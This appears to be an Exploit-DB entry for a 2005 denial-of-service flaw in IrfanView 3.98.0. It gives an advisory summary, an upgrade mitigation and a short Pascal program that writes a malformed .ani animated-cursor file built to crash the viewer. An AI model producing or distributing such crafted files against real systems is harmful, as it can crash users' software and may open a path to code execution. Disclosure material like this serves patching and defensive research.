IrfanView Denial-of-Service Vulnerability

vendor:

IrfanView

by:

SecurityFocus

7.5

CVSS

HIGH

Denial-of-Service

400

CWE

Product Name: IrfanView

Affected Version From: 3.98.0

Affected Version To: 3.98.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

IrfanView Denial-of-Service Vulnerability

IrfanView is prone to a denial-of-service vulnerability. A remote attacker may crash the application, resulting in denial-of-service conditions to legitimate users. This issue may potentially be exploited to execute arbitrary machine code, but this has not been confirmed.

Mitigation:

Upgrade to the latest version of IrfanView.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19452/info

IrfanView is prone to a denial-of-service vulnerability. 

A remote attacker may crash the application, resulting in denial-of-service conditions to legitimate users. 

This issue may potentially be exploited to execute arbitrary machine code, but this has not been
confirmed.

Version 3.98.0 is vulnerable to this issue; other versions may also be affected.

program ani;
 {$APPTYPE CONSOLE}
 const
   FileName='file.ani';
   Len=113;
   Buf=#$52#$49#$46#$46#$00#$00#$00#$00#$41#$43#$4F#$4E#$00#$00#$00#$00#$24#$00+
   #$00#$00#$24#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
   #$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
   #$4C#$49#$53#$54#$00#$00#$00#$00#$66#$72#$61#$6D#$69#$63#$6F#$6E#$00#$00#$00+
   #$00#$00#$00#$00#$00#$01#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$02#$00+
   #$16#$00#$00#$00#$28#$00#$00#$00#$FF#$FF#$FF#$00#$02#$00#$00#$00#$00#$00#$01;
 var
   F:File;
   I:Byte;
 begin
   AssignFile(F,FileName);
   Rewrite(F,1);
   BlockWrite(F, Buf, Len);
   CloseFile(F);
 end.